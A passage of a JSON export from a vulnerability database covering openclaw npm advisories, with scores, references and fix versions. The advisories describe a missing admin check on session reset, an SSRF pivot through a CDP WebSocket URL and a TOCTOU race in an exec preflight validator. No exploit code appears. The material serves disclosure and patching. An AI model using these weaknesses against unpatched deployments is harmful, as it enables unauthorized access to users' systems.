shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server-methods/agent.ts` now rejects `/reset` and `/new` for callers that do not have `operator.admin` before calling `performGatewaySessionReset(...)`.\n- `src/gateway/server-methods/agent.test.ts` contains the regression test `rejects /reset for write-scoped gateway callers`.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35660", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00052", "scoring_system": "epss", "scoring_elements": "0.16539", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00052", "scoring_system": "epss", "scoring_elements": "0.16494", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00052", "scoring_system": "epss", "scoring_elements": "0.16536", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35660" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35660", "reference_id": "CVE-2026-35660", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35660" }, { "reference_url": "https://github.com/advisories/GHSA-wq58-2pvg-5h4f", "reference_id": "GHSA-wq58-2pvg-5h4f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wq58-2pvg-5h4f" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset", "reference_id": "openclaw-insufficient-access-control-in-gateway-agent-session-reset", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:41:04Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api", "purl": "pkg:npm/openclaw@2026.3.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23" } ], "aliases": [ "CVE-2026-35660", "GHSA-wq58-2pvg-5h4f" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wut7-y72y-9ucb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89666?format=api", "vulnerability_id": "VCID-wyce-qxau-mqff", "summary": "OpenClaw: CDP /json/version WebSocket URL could pivot to untrusted second-hop targets\n## Summary\n\nCDP /json/version WebSocket URL could pivot to untrusted second-hop targets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.5`\n- Patched versions: `>= 2026.4.5`\n\n## Impact\n\nA browser profile could trust a CDP `/json/version` response whose `webSocketDebuggerUrl` pointed at a different host, enabling a second-hop SSRF-style pivot.\n\n## Technical Details\n\nThe fix normalizes and re-validates direct CDP WebSocket targets before connecting.\n\n## Fix\n\nThe issue was fixed in #60469. The first stable tag containing the fix is `v2026.4.5`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `bc356cc8c2beaa747c71dd86cceab8f804699665`\n- PR: #60469\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.5 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43576", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10189", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10209", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11778", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43576" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/60469", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/60469" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43576", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43576" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url" }, { "reference_url": "https://github.com/advisories/GHSA-f7fh-qg34-x2xh", "reference_id": "GHSA-f7fh-qg34-x2xh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f7fh-qg34-x2xh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110881?format=api", "purl": "pkg:npm/openclaw@2026.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-x1qe-u363-qqaa" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5" } ], "aliases": [ "CVE-2026-43576", "GHSA-f7fh-qg34-x2xh" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wyce-qxau-mqff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89271?format=api", "vulnerability_id": "VCID-x2ru-ydpv-f3ah", "summary": "OpenClaw: TOCTOU read in exec script preflight\n## Summary\n\nOpenClaw's exec script preflight validator previously validated and then read a script by mutable pathname. A local race could swap the path between validation and read, causing preflight analysis to inspect a different file identity than the one that passed the workspace boundary check.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe impact is limited. This was not arbitrary full-file disclosure through the preflight error path. The validator only surfaced derived preflight content, such as a matched token, a line number, or the first non-empty JavaScript line in one branch. Exploitation also required the ability to mutate the relevant workspace path during the preflight 